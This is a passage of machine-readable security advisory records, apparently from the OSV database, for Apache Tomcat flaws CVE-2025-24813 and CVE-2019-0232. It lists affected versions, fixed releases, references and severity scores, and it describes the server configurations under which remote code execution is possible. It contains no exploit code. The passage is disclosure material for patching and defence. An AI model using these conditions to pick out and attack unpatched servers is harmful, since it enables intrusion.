"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-83qj-6fr2-vhqg", "published": "2025-03-10T18:31:56Z", "modified": "2025-10-22T19:55:27.684619Z", "aliases": [ "BIT-tomcat-2025-24813", "CVE-2025-24813" ], "related": [ "CGA-3gj2-76vf-63rm" ], "summary": "Apache Tomcat: Potential RCE and/or information disclosure and/or information corruption with partial PUT", "details": "Path Equivalence: 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. 
Other, older, EOL versions may also be affected.\n\nIf all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files:\n- writes enabled for the default servlet (disabled by default)\n- support for partial PUT (enabled by default)\n- a target URL for security sensitive uploads that was a sub-directory of a target URL for public uploads\n- attacker knowledge of the names of security sensitive files being uploaded\n- the security sensitive files also being uploaded via partial PUT\n\nIf all of the following were true, a malicious user was able to perform remote code execution:\n- writes enabled for the default servlet (disabled by default)\n- support for partial PUT (enabled by default)\n- application was using Tomcat's file based session persistence with the default storage location\n- application included a library that may be leveraged in a deserialization attack\n\nUsers are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.99, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.3" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": 
"ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.35" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.99" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", 
"9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.3" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.35" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.99" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", 
"8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", 
"8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24813" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/0a668e0c27f2b7ca0cc7c6eea32253b9b5ecb29c" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/eb61aade8f8daccaecabf07d428b877975622f72" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f6c01d6577cf9a1e06792be47e623d36acc3b5dc" }, { "type": "WEB", "url": "https://github.com/absholi7ly/POC-CVE-2025-24813/blob/main/README.md" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00003.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250321-0001" }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-24813" }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24813-detect-apache-tomcat-rce" }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24813-mitigate-apache-tomcat-rce" }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24813-tomcat-detect-vulnerability" }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24813-tomcat-mitigation-vulnerability" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/03/10/5" } ], "database_specific": { "cwe_ids": [ "CWE-44", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2025-03-10T22:25:00Z", "nvd_published_at": "2025-03-10T17:15:35Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8vmx-qmch-mpqg", "published": "2019-04-18T14:27:35Z", "modified": "2024-03-16T05:19:17.739703Z", "aliases": [ "CVE-2019-0232" ], "summary": "Apache Tomcat OS Command Injection vulnerability", "details": "When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.17" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-8vmx-qmch-mpqg/GHSA-8vmx-qmch-mpqg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.40" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-8vmx-qmch-mpqg/GHSA-8vmx-qmch-mpqg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.94" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", 
"7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-8vmx-qmch-mpqg/GHSA-8vmx-qmch-mpqg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0232" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190419-0001" }, { "type": "WEB", "url": "https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227030103/http://www.securityfocus.com/bid/107906" }, { "type": "WEB", "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2019-784" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://www.synology.com/security/advisory/Synology_SA_19_17" }, { "type": "WEB", "url": "https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1712" }, { "type": "WEB", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat" }, { "type": "WEB", "url": 
"https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/52ffb9fbf661245386a83a661183d13f1de2e5779fa23837a08e02ac%40%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/52ffb9fbf661245386a83a661183d13f1de2e5779fa23837a08e02ac@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5f297a4b9080b5f65a05bc139596d0e437d6a539b25e31d29d028767%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5f297a4b9080b5f65a05bc139596d0e437d6a539b25e31d29d028767@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/673b6148d92cd7bc99ea2dcf85ad75d57da44fc322d51f37fb529a2a%40%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/673b6148d92cd7bc99ea2dcf85ad75d57da44fc322d51f37fb529a2a@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/96849486813a95dfd542e1618b7923ca945508aaf4a4341f674d83e3%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/96849486813a95dfd542e1618b7923ca945508aaf4a4341f674d83e3@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a6c87a09a71162fd563ab1c4e70a08a103e0b7c199fc391f1c9c4c35%40%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a6c87a09a71162fd563ab1c4e70a08a103e0b7c199fc391f1c9c4c35@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dd4b325cdb261183dbf5ce913c102920a8f09c26dae666a98309165b%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dd4b325cdb261183dbf5ce913c102920a8f09c26dae666a98309165b@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f4d48b32ef2b6aa49c8830241a9475da5b46e451f964b291c7a0a715%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f4d48b32ef2b6aa49c8830241a9475da5b46e451f964b291c7a0a715@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/153506/Apache-Tomcat-CGIServlet-enableCmdLineArguments-Remote-Code-Execution.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/4" } ], "database_specific": { "cwe_ids": [ "CWE-78" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:26:43Z", "nvd_published_at": "2019-04-15T15:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9hg2-395j-83rm", "published": "2022-05-13T01:46:13Z", "modified": 
"2024-04-18T17:16:24.017955Z", "aliases": [ "CVE-2017-5651" ], "summary": "Expected Behavior Violation in Apache Tomcat", "details": "In Apache Tomcat 9.0.0.M1 to 9.0.0.M18 and 8.5.0 to 8.5.12, the refactoring of the HTTP connectors introduced a regression in the send file processing. If the send file processing completed quickly, it was possible for the Processor to be added to the processor cache twice. This could result in the same Processor being used for multiple requests which in turn could lead to unexpected errors and/or response mix-up.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.0.M19" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.0.M18", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9hg2-395j-83rm/GHSA-9hg2-395j-83rm.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.13" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.2", "8.5.3", "8.5.4", "8.5.5", "8.5.6", 